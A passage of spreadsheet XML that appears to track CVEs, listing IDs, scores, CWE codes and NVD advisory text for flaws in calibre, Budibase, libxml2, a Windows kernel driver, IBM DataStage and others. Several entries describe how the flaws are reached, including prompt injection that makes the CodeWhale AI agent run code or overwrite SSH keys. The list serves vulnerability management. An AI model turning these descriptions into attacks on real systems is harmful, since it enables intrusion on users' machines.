          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1540" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73248</t>
        </is>
      </c>
      <c r="C1540" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1540" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1540" s="5" t="inlineStr"/>
      <c r="F1540" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1540" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H1540" s="5" t="inlineStr"/>
      <c r="I1540" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J1540" s="5" t="inlineStr"/>
      <c r="K1540" s="5" t="inlineStr">
        <is>
          <t>CWE-94, CWE-95</t>
        </is>
      </c>
      <c r="L1540" s="5" t="inlineStr">
        <is>
          <t>calibre is an e-book manager. Prior to 9.12.0, calibre processes attacker-controlled composite_template metadata from a malicious EPUB, OPF, PDF, or similar file through program: and a nested template() call whose formatter does not inherit allow_python_templates=False, allowing a nested python: template to reach compile_python_template and execute arbitrary Python code when the file is opened or imported. This issue is fixed in version 9.12.0.</t>
        </is>
      </c>
      <c r="M1540" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73248</t>
        </is>
      </c>
    </row>
    <row r="1541">
      <c r="A1541" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1541" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73410</t>
        </is>
      </c>
      <c r="C1541" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1541" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1541" s="5" t="inlineStr"/>
      <c r="F1541" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1541" s="5" t="inlineStr"/>
      <c r="H1541" s="5" t="inlineStr"/>
      <c r="I1541" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J1541" s="5" t="inlineStr"/>
      <c r="K1541" s="5" t="inlineStr">
        <is>
          <t>CWE-367, CWE-918</t>
        </is>
      </c>
      <c r="L1541" s="5" t="inlineStr">
        <is>
          <t>Budibase is an open-source low-code platform. Prior to 3.40.0, packages/backend-core/src/utils/outboundFetch.ts pinned a validated address through a Node agent, but the REST integration used getDispatcher from packages/backend-core/src/utils/fetch.ts, causing undici to ignore that agent and resolve the hostname again. A builder could use DNS rebinding to make packages/server/src/integrations/rest.ts connect to an internal address after a public address passed validation, with full response access and arbitrary REST methods. The fix adds createPinnedLookup support to the undici dispatcher and passes the validated address to custom fetch implementations. This issue is fixed in version 3.40.0.</t>
        </is>
      </c>
      <c r="M1541" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73410</t>
        </is>
      </c>
    </row>
    <row r="1542">
      <c r="A1542" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1542" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-74860</t>
        </is>
      </c>
      <c r="C1542" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1542" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1542" s="5" t="inlineStr"/>
      <c r="F1542" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1542" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H1542" s="5" t="inlineStr"/>
      <c r="I1542" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1542" s="5" t="inlineStr"/>
      <c r="K1542" s="5" t="inlineStr">
        <is>
          <t>CWE-763</t>
        </is>
      </c>
      <c r="L1542" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in libxml2 with Python bindings enabled. A remote attacker could exploit this vulnerability by providing a specially crafted XML document containing a Document Type Definition (DTD) with enumerated attribute values. This triggers a double-free error in the SAX attributeDecl callback handler, where a string is freed twice. This flaw can lead to a denial of service (DoS) due to a reproducible crash in Python applications using the libxml2 SAX bindings.</t>
        </is>
      </c>
      <c r="M1542" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-74860</t>
        </is>
      </c>
    </row>
    <row r="1543">
      <c r="A1543" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1543" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75142</t>
        </is>
      </c>
      <c r="C1543" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1543" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1543" s="5" t="inlineStr"/>
      <c r="F1543" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1543" s="5" t="inlineStr"/>
      <c r="H1543" s="5" t="inlineStr"/>
      <c r="I1543" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J1543" s="5" t="inlineStr"/>
      <c r="K1543" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L1543" s="5" t="inlineStr">
        <is>
          <t>FFmpeg before commit 9d786e4 contains a stack buffer overflow in the MPEG-PS muxer (libavformat/mpegenc.c). When muxing input with more streams than the muxer's fixed-size stack buffer accommodates, the buffer is overflowed. A crafted input with an excessive number of streams triggers the overflow during MPEG-PS muxing.</t>
        </is>
      </c>
      <c r="M1543" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75142</t>
        </is>
      </c>
    </row>
    <row r="1544">
      <c r="A1544" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1544" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75486</t>
        </is>
      </c>
      <c r="C1544" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1544" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1544" s="5" t="inlineStr"/>
      <c r="F1544" s="5" t="n">
        <v>0.013</v>
      </c>
      <c r="G1544" s="5" t="inlineStr"/>
      <c r="H1544" s="5" t="inlineStr"/>
      <c r="I1544" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J1544" s="5" t="inlineStr"/>
      <c r="K1544" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1544" s="5" t="inlineStr">
        <is>
          <t>Synk Sweater Comb before 3.8.8 contains a command injection vulnerability that allows an attacker who controls the .vervet.yaml configuration file to execute arbitrary OS commands by injecting malicious input into the linters.&lt;key&gt;.optic-ci.original branch name field. The expectGitBranch() function in src/lint.ts passes the unsanitized branch name directly into child_process.exec() via an unescaped template literal, enabling arbitrary command execution when the lint command is run against the repository.</t>
        </is>
      </c>
      <c r="M1544" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75486</t>
        </is>
      </c>
    </row>
    <row r="1545">
      <c r="A1545" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1545" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75616</t>
        </is>
      </c>
      <c r="C1545" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1545" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1545" s="5" t="inlineStr"/>
      <c r="F1545" s="5" t="n">
        <v>0.031</v>
      </c>
      <c r="G1545" s="5" t="inlineStr"/>
      <c r="H1545" s="5" t="inlineStr">
        <is>
          <t>tp-link:archer_c20, tp-link:archer_c20_firmware</t>
        </is>
      </c>
      <c r="I1545" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J1545" s="5" t="inlineStr"/>
      <c r="K1545" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1545" s="5" t="inlineStr">
        <is>
          <t>An OS command injection vulnerability exists in the web management interface of Archer C20 v6 firmware when processing certain WAN-related configuration operations. An authenticated administrator may exploit insufficient input validation to execute arbitrary system commands, potentially resulting in full device compromise.
Successful exploitation may allow arbitrary command execution with elevated privileges, compromising the confidentiality, integrity, and availability of the affected device and network traffic passing through it.</t>
        </is>
      </c>
      <c r="M1545" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75616</t>
        </is>
      </c>
    </row>
    <row r="1546">
      <c r="A1546" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1546" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75858</t>
        </is>
      </c>
      <c r="C1546" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1546" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1546" s="5" t="inlineStr"/>
      <c r="F1546" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1546" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H1546" s="5" t="inlineStr"/>
      <c r="I1546" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J1546" s="5" t="inlineStr"/>
      <c r="K1546" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L1546" s="5" t="inlineStr">
        <is>
          <t>CodeWhale (packages codewhale / codewhale-tui) versions &gt;= 0.8.41 and &lt; 0.8.64 contain a remote code execution vulnerability in the rlm_eval tool. The tool's approval_requirement() returns ApprovalRequirement::Auto, which the engine treats as 'never prompt,' causing arbitrary model-supplied Python code to run in a python3 interpreter without consulting the user's configured --approval-policy and without any approval prompt or audit step. An attacker can induce the agent to execute arbitrary code via prompt injection in untrusted content the agent reads (a web page, fetched URL, repository file, or MCP tool result); the companion rlm_open tool can stage such content. Code runs on the user's machine at the user's privilege level. Fixed in 0.8.64.</t>
        </is>
      </c>
      <c r="M1546" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75858</t>
        </is>
      </c>
    </row>
    <row r="1547">
      <c r="A1547" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1547" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75911</t>
        </is>
      </c>
      <c r="C1547" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1547" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1547" s="5" t="inlineStr"/>
      <c r="F1547" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1547" s="5" t="inlineStr"/>
      <c r="H1547" s="5" t="inlineStr"/>
      <c r="I1547" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J1547" s="5" t="inlineStr"/>
      <c r="K1547" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L1547" s="5" t="inlineStr">
        <is>
          <t>CodeWhale versions before 0.8.64 fail to properly validate the allow_shell configuration parameter from project config files, allowing attackers to enable arbitrary shell command execution by committing a malicious .codewhale/config.toml file to a repository. When a user clones and opens the repository in CodeWhale, the AI model gains access to exec_shell and task_shell tools, enabling execution of arbitrary shell commands on the victim's machine without explicit user consent.</t>
        </is>
      </c>
      <c r="M1547" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75911</t>
        </is>
      </c>
    </row>
    <row r="1548">
      <c r="A1548" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1548" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75913</t>
        </is>
      </c>
      <c r="C1548" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1548" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1548" s="5" t="inlineStr"/>
      <c r="F1548" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1548" s="5" t="inlineStr"/>
      <c r="H1548" s="5" t="inlineStr"/>
      <c r="I1548" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J1548" s="5" t="inlineStr"/>
      <c r="K1548" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="L1548" s="5" t="inlineStr">
        <is>
          <t>CodeWhale (codewhale / codewhale-tui) versions &gt;= 0.8.41 and &lt; 0.8.64 contain an argument injection vulnerability in the git_show tool. The model-supplied rev parameter is passed unvalidated into the git show argv without an --end-of-options sentinel, so a value beginning with --output= is interpreted as a git flag. Because the tool is registered as auto-approved and advertised as read-only, an attacker (via a malicious repository combined with prompt injection) can cause an unprompted arbitrary file write at the privilege of the invoking user, targeting sensitive files such as ~/.ssh/authorized_keys, ~/.bashrc, or ~/.gitconfig. Fixed in 0.8.64 by adding rev validation.</t>
        </is>
      </c>
      <c r="M1548" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75913</t>
        </is>
      </c>
    </row>
    <row r="1549">
      <c r="A1549" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1549" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75993</t>
        </is>
      </c>
      <c r="C1549" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1549" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1549" s="5" t="inlineStr"/>
      <c r="F1549" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1549" s="5" t="inlineStr"/>
      <c r="H1549" s="5" t="inlineStr"/>
      <c r="I1549" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1549" s="5" t="inlineStr"/>
      <c r="K1549" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1549" s="5" t="inlineStr">
        <is>
          <t>ColdFusion is affected by a reflected Cross-Site Scripting (XSS) vulnerability. An attacker could exploit this vulnerability to inject malicious scripts into a web page, potentially gaining elevated access or control over the victim's account or session. Exploitation of this issue requires user interaction in that a victim must open a malicious file. Scope is changed.</t>
        </is>
      </c>
      <c r="M1549" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75993</t>
        </is>
      </c>
    </row>
    <row r="1550">
      <c r="A1550" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1550" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76958</t>
        </is>
      </c>
      <c r="C1550" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1550" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1550" s="5" t="inlineStr"/>
      <c r="F1550" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1550" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="H1550" s="5" t="inlineStr"/>
      <c r="I1550" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1550" s="5" t="inlineStr"/>
      <c r="K1550" s="5" t="inlineStr">
        <is>
          <t>CWE-611</t>
        </is>
      </c>
      <c r="L1550" s="5" t="inlineStr">
        <is>
          <t>SAP Integration Suite does not sufficiently validate XML documents accepted from untrusted sources in certain internal components. An attacker with low privileges could submit specially crafted XML payloads containing malicious external entity declarations. Successful exploitation could allow the attacker to read sensitive file contents from the server and expose them through monitoring or logging output, resulting in a high impact on confidentiality. It could also lead to resource exhaustion, causing a low impact on availability. There is no impact on integrity.</t>
        </is>
      </c>
      <c r="M1550" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76958</t>
        </is>
      </c>
    </row>
    <row r="1551">
      <c r="A1551" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1551" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77091</t>
        </is>
      </c>
      <c r="C1551" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1551" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1551" s="5" t="inlineStr"/>
      <c r="F1551" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1551" s="5" t="inlineStr"/>
      <c r="H1551" s="5" t="inlineStr"/>
      <c r="I1551" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1551" s="5" t="inlineStr"/>
      <c r="K1551" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1551" s="5" t="inlineStr">
        <is>
          <t>DataCube contained a path traversal issue affecting security feature enforcement. Software customers upgrade to resolved maintenance release. Update Content Extractor and Index Store.</t>
        </is>
      </c>
      <c r="M1551" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77091</t>
        </is>
      </c>
    </row>
    <row r="1552">
      <c r="A1552" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1552" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77974</t>
        </is>
      </c>
      <c r="C1552" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1552" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1552" s="5" t="inlineStr"/>
      <c r="F1552" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1552" s="5" t="inlineStr"/>
      <c r="H1552" s="5" t="inlineStr"/>
      <c r="I1552" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1552" s="5" t="inlineStr"/>
      <c r="K1552" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L1552" s="5" t="inlineStr">
        <is>
          <t>After spoofing the device and obtaining one user confirmation, an attacker may be able to cause the application to transmit firmware through an unauthenticated and unsigned update channel.</t>
        </is>
      </c>
      <c r="M1552" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77974</t>
        </is>
      </c>
    </row>
    <row r="1553">
      <c r="A1553" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1553" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80112</t>
        </is>
      </c>
      <c r="C1553" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1553" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1553" s="5" t="inlineStr"/>
      <c r="F1553" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1553" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1553" s="5" t="inlineStr"/>
      <c r="I1553" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1553" s="5" t="inlineStr"/>
      <c r="K1553" s="5" t="inlineStr">
        <is>
          <t>CWE-732</t>
        </is>
      </c>
      <c r="L1553" s="5" t="inlineStr">
        <is>
          <t>PassMark PerformanceTest before 11.1 build 1012, BurnInTest before 11.1 build 1000, and OSForensics before 11.1 build 1016 contain an improper access control vulnerability in the DirectIo64.sys kernel driver that allows unprivileged local users to perform privileged hardware operations by opening a handle to the device object created without a security descriptor. Attackers can issue IOCTLs through the permissive default Windows ACL applied to the device to access restricted hardware operations regardless of privilege or integrity level.</t>
        </is>
      </c>
      <c r="M1553" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80112</t>
        </is>
      </c>
    </row>
    <row r="1554">
      <c r="A1554" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1554" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80114</t>
        </is>
      </c>
      <c r="C1554" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1554" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1554" s="5" t="inlineStr"/>
      <c r="F1554" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1554" s="5" t="inlineStr"/>
      <c r="H1554" s="5" t="inlineStr"/>
      <c r="I1554" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1554" s="5" t="inlineStr"/>
      <c r="K1554" s="5" t="inlineStr">
        <is>
          <t>CWE-321</t>
        </is>
      </c>
      <c r="L1554" s="5" t="inlineStr">
        <is>
          <t>PassMark PerformanceTest before 11.1 build 1012, BurnInTest before 11.1 build 1000, and OSForensics before 11.1 build 1016 contain a hard-coded credentials vulnerability in DirectIo64.sys that allows local attackers to perform arbitrary physical memory writes by extracting an 8-byte key embedded as a hardcoded literal in the distributed binary and computing valid MD5 authentication tags for arbitrary IOCTL write requests. Attackers can additionally bypass a secondary validation gate by using the driver's own bit-clear IOCTL to clear a single bit in the gating instruction's displacement byte, causing all subsequent write requests to skip MAC verification, size checks, and Vendor ID checks entirely.</t>
        </is>
      </c>
      <c r="M1554" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80114</t>
        </is>
      </c>
    </row>
    <row r="1555">
      <c r="A1555" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1555" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80116</t>
        </is>
      </c>
      <c r="C1555" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1555" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1555" s="5" t="inlineStr"/>
      <c r="F1555" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1555" s="5" t="inlineStr"/>
      <c r="H1555" s="5" t="inlineStr"/>
      <c r="I1555" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1555" s="5" t="inlineStr"/>
      <c r="K1555" s="5" t="inlineStr">
        <is>
          <t>CWE-782</t>
        </is>
      </c>
      <c r="L1555" s="5" t="inlineStr">
        <is>
          <t>PassMark PerformanceTest before 11.1 build 1012, BurnInTest before 11.1 build 1000, and OSForensics before 11.1 build 1016 contain a privilege escalation vulnerability in DirectIo64.sys that allows local users to modify hardware configuration by exploiting exposed IOCTLs with no validation on device selection, register offset, or value. Attackers can obtain a device handle and issue arbitrary PCI configuration space read/write operations to enable Bus Master DMA on any PCI device, halt storage controller I/O by clearing command registers, or remap Base Address Registers to redirect DMA to an attacker-chosen physical address.</t>
        </is>
      </c>
      <c r="M1555" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80116</t>
        </is>
      </c>
    </row>
    <row r="1556">
      <c r="A1556" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1556" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80119</t>
        </is>
      </c>
      <c r="C1556" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1556" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1556" s="5" t="inlineStr"/>
      <c r="F1556" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1556" s="5" t="inlineStr"/>
      <c r="H1556" s="5" t="inlineStr"/>
      <c r="I1556" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1556" s="5" t="inlineStr"/>
      <c r="K1556" s="5" t="inlineStr">
        <is>
          <t>CWE-497, CWE-73</t>
        </is>
      </c>
      <c r="L1556" s="5" t="inlineStr">
        <is>
          <t>PassMark PerformanceTest before 11.1 build 1012, BurnInTest before 11.1 build 1000, and OSForensics before 11.1 build 1016 contain an information disclosure vulnerability in DirectIo64.sys that allows unauthenticated local attackers to dump complete physical memory contents by supplying a caller-controlled file path to an exposed IOCTL. Attackers can issue a single IOCTL call to trigger the driver to iterate all physical memory ranges via MmGetPhysicalMemoryRanges and map each page through ZwMapViewOfSection on the PhysicalMemory section object, writing a full RAM image to an attacker-specified path in the SYSTEM context, bypassing user-mode ACLs and exposing LSASS working set, process memory, and cryptographic material from all running processes.</t>
        </is>
      </c>
      <c r="M1556" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80119</t>
        </is>
      </c>
    </row>
    <row r="1557">
      <c r="A1557" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1557" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80378</t>
        </is>
      </c>
      <c r="C1557" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1557" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1557" s="5" t="inlineStr"/>
      <c r="F1557" s="5" t="inlineStr"/>
      <c r="G1557" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H1557" s="5" t="inlineStr"/>
      <c r="I1557" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1557" s="5" t="inlineStr"/>
      <c r="K1557" s="5" t="inlineStr">
        <is>
          <t>CWE-285</t>
        </is>
      </c>
      <c r="L1557" s="5" t="inlineStr">
        <is>
          <t>IBM DataStage on Cloud Pak for Data 5.4.0.0 could allow a remote authenticated attacker to cause a denial of service due to improper authorization.</t>
        </is>
      </c>
      <c r="M1557" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80378</t>
        </is>
      </c>
    </row>
    <row r="1558">
      <c r="A1558" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1558" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80436</t>
        </is>
      </c>
      <c r="C1558" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1558" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1558" s="5" t="inlineStr"/>
      <c r="F1558" s="5" t="inlineStr"/>
      <c r="G1558" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H1558" s="5" t="inlineStr"/>
      <c r="I1558" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1558" s="5" t="inlineStr"/>
      <c r="K1558" s="5" t="inlineStr">
        <is>
          <t>CWE-285</t>
        </is>
      </c>
      <c r="L1558" s="5" t="inlineStr">
        <is>
          <t>IBM DataStage on Cloud Pak for Data 5.4.0.0 could allow a remote authenticated attacker to cause a denial of service by deleting arbitrary RabbitMQ queues or exchanges due to improper authorization.</t>
        </is>
      </c>
      <c r="M1558" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80436</t>
        </is>
      </c>
    </row>
    <row r="1559">
      <c r="A1559" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1559" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81207</t>
        </is>
      </c>
      <c r="C1559" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1559" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1559" s="5" t="inlineStr"/>
      <c r="F1559" s="5" t="inlineStr"/>
      <c r="G1559" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H1559" s="5" t="inlineStr"/>
      <c r="I1559" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1559" s="5" t="inlineStr"/>
      <c r="K1559" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L1559"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M1559" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81207</t>
        </is>
      </c>
    </row>
    <row r="1560">
      <c r="A1560" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1560" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81302</t>
        </is>
      </c>
      <c r="C1560" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1560" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1560" s="5" t="inlineStr"/>
      <c r="F1560" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1560" s="5" t="inlineStr"/>
      <c r="H1560" s="5" t="inlineStr"/>
      <c r="I1560" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1560" s="5" t="inlineStr"/>
      <c r="K1560" s="5" t="inlineStr">
        <is>
          <t>CWE-276</t>
        </is>
      </c>
      <c r="L1560" s="5" t="inlineStr">
        <is>
          <t>PALLET CONTROL products contain an incorrect default permission vulnerability, which may allow a local attacker to execute arbitrary code with SYSTEM privileges on the affected product.</t>
        </is>
      </c>
      <c r="M1560" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81302</t>
        </is>
      </c>
    </row>
    <row r="1561">
      <c r="A1561" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
